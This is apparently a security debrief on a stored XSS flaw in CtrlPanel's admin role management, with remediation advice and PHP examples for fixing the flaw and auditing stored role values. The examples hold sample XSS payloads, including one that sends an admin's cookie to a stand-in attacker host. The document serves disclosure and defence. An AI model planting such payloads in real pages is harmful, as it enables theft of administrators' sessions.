PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-34246 Ctrlpanel-gg CVE debrief

CVE-2026-34246 describes a stored cross-site scripting flaw in CtrlPanel's admin role management interface. In affected versions, role name and color values are written into HTML without output escaping, and DataTables is instructed to treat the name column as raw HTML. That combination lets a user who holds role creation or edit permissions store a payload that executes in every other admin's browser when they open the roles page. The issue is fixed in CtrlPanel 1.2.0.

Vendor
Ctrlpanel-gg
Product
panel
CVSS
MEDIUM 4.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-19
Original CVE updated
2026-05-20
Advisory published
2026-05-19
Advisory updated
2026-05-20

Who should care

Administrators and security teams running CtrlPanel 1.1.1 or earlier, especially environments where non-superadmin users can create or edit roles. This is most important for teams that rely on the /admin/roles interface and have multiple admins or delegated role-management permissions.

Technical summary

The vulnerability is a stored XSS in app/Http/Controllers/Admin/RoleController.php. The datatable() method interpolates $role->name and $role->color directly into a <span> element, the name as the element's text and the color inside its style attribute, without escaping either value, and rawColumns(['actions', 'name']) tells DataTables not to escape the name column on the client either. Because the color lands in an attribute, a value containing a double quote can close the attribute and add an event handler, while the name can carry arbitrary tags directly. A malicious role value is therefore persisted to the database and rendered as executable HTML/JavaScript in the browser of any admin who loads /admin/roles, for as long as the record exists. The CVSS vector (PR:H, UI:R, scope changed) reflects that the attacker must already hold role-management permission and that a victim must view the page, while the impact crosses from the attacker's account into other admins' sessions. The supplied CVE record and GitHub advisory references indicate the issue is resolved in version 1.2.0.
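The following is an added example, not code from CtrlPanel's RoleController.php. It reproduces the pattern the summary describes in plain PHP 8 so it can be run without Laravel or DataTables, then shows the hardened form a reviewer would expect: the name escaped for an HTML text context, and the color validated against a strict allow-list because escaping alone does not make arbitrary input safe inside a style attribute. The Role class, the function names and the sample payload are illustrative assumptions.

```php
<?php
// Added example, not CtrlPanel's own code. Function and class names are
// illustrative; only the interpolation pattern mirrors the advisory.
declare(strict_types=1);

final class Role
{
    public function __construct(public string $name, public string $color) {}
}

// VULNERABLE: raw interpolation, as the advisory describes. With the column
// registered via rawColumns(['name']) on the DataTables side, the browser
// parses this string as HTML, so both fields are attacker-controlled markup.
function renderNameCellVulnerable(Role $role): string
{
    return "<span style=\"color: {$role->color}\">{$role->name}</span>";
}

// HARDENED: each value is treated according to the context it lands in.
// - name: HTML text, so htmlspecialchars() with ENT_QUOTES is sufficient.
// - color: a CSS value inside a style attribute; entity-encoding it would
//   still let odd values through, so it is validated against a hex-color
//   allow-list (assumption: roles store hex colors) and replaced otherwise.
function renderNameCellHardened(Role $role): string
{
    $color = preg_match('/^#[0-9a-fA-F]{3}([0-9a-fA-F]{3})?$/', $role->color) === 1
        ? $role->color
        : '#000000';
    $name = htmlspecialchars($role->name, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    return "<span style=\"color: {$color}\">{$name}</span>";
}

// Constructed sample input: a role whose name carries an <img onerror> payload
// and whose color breaks out of the style attribute to add an event handler.
$malicious = new Role(
    '<img src=x onerror=alert(document.cookie)>',
    'red" onmouseover="alert(1)'
);

echo "vulnerable: ", renderNameCellVulnerable($malicious), PHP_EOL;
echo "hardened:   ", renderNameCellHardened($malicious), PHP_EOL;
```

Run with `php example.php`. The vulnerable line reproduces the payload as live markup, including the injected onmouseover attribute; the hardened line emits the name as entity-encoded text and falls back to the default color, so nothing in either field is interpreted by the browser. Under Yajra DataTables the equivalent change is to escape inside the column callback and drop 'name' from rawColumns() unless it genuinely needs markup.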

Defensive priority

High for affected deployments. Although the CVSS score is Medium, the bug is stored, admin-facing, and persistent: one malicious role record fires on every load of /admin/roles until it is removed, and the scope-changed vector means a delegated role manager can reach the sessions of fully privileged admins. Deployments where only a single trusted superadmin can create or edit roles have far less exposure, since the attacker must already hold that permission.

Recommended defensive actions

  • Upgrade CtrlPanel to version 1.2.0 or later.
  • Review any existing role names and color values for unexpected HTML, script, or event-handler content.
  • Restrict role creation and edit permissions to the minimum set of trusted administrators.
  • Verify that server-side output escaping is applied in the admin roles table, especially for any value inserted into HTML attributes or raw DataTables columns, and that color values are validated against an allow-list rather than only escaped, since escaping alone does not make arbitrary input safe inside a style attribute.
  • If compromise is suspected, force admin session rotation and inspect recent role-management changes.
  • Use the official GitHub advisory and release notes to confirm remediation steps for your deployment.
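As an added example for the review step above (not a CtrlPanel tool or script), the check below scans role rows for content that would have executed under the vulnerable rendering. The $rows array is constructed sample data standing in for a SELECT over the roles table; the column names id, name and color and the assumption that colors are stored as hex codes are illustrative and should be adjusted to the deployment.

```php
<?php
// Added example, not CtrlPanel's own code. Column names and the hex-color
// assumption are illustrative; $rows is constructed sample data.
declare(strict_types=1);

/**
 * Return one finding per suspicious field.
 * A name is flagged if it contains characters meaningful in HTML (<, >, quotes,
 * &), an inline event-handler attribute, or a javascript: URL. A color is
 * flagged unless it is a plain hex code, because anything else could only have
 * been stored through the unescaped style attribute path or by hand.
 * The name check is deliberately broad: a legitimate "R&D" role will be
 * listed too, and is cheap to dismiss on inspection.
 */
function auditRoles(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        $name = (string) $row['name'];
        if (preg_match('/[<>"\'&]/', $name) === 1
            || preg_match('/\bon[a-z]+\s*=/i', $name) === 1
            || stripos($name, 'javascript:') !== false) {
            $findings[] = ['id' => $row['id'], 'field' => 'name', 'value' => $name];
        }

        $color = (string) $row['color'];
        if (preg_match('/^#[0-9a-fA-F]{3}([0-9a-fA-F]{3})?$/', $color) !== 1) {
            $findings[] = ['id' => $row['id'], 'field' => 'color', 'value' => $color];
        }
    }
    return $findings;
}

// Constructed rows: two clean roles, one with a payload in the name that
// exfiltrates the viewing admin's cookie, one with a style-attribute breakout.
$rows = [
    ['id' => 1, 'name' => 'Admin',   'color' => '#ff0000'],
    ['id' => 2, 'name' => 'Support', 'color' => '#00aa00'],
    ['id' => 3, 'name' => '<img src=x onerror=fetch("https://attacker.invalid/?c="+document.cookie)>', 'color' => '#000000'],
    ['id' => 4, 'name' => 'Billing', 'color' => 'blue" onmouseover="alert(1)'],
];

foreach (auditRoles($rows) as $f) {
    printf("role %d: suspicious %s: %s\n", $f['id'], $f['field'], $f['value']);
}
```

Running it lists roles 3 and 4. Any role it flags in a real database should be treated as evidence of exploitation rather than just cleaned up: note who last edited it and when, then rotate the sessions of admins who could have viewed the page in that window, as the actions above recommend.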

Evidence notes

The supplied CVE description states that versions 1.1.1 and prior are affected and that 1.2.0 resolves the issue. The NVD source metadata lists CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N (base score 4.8) and CWE-80/CWE-116. References in the source corpus point to the upstream GitHub security advisory and the 1.2.0 release tag. The CVE record was published on 2026-05-19 and modified on 2026-05-20; the dates in this debrief reflect that record.

Official resources

Public disclosure is reflected in the CVE/NVD record dated 2026-05-19, with upstream GitHub advisory and release references pointing to the fix in CtrlPanel 1.2.0.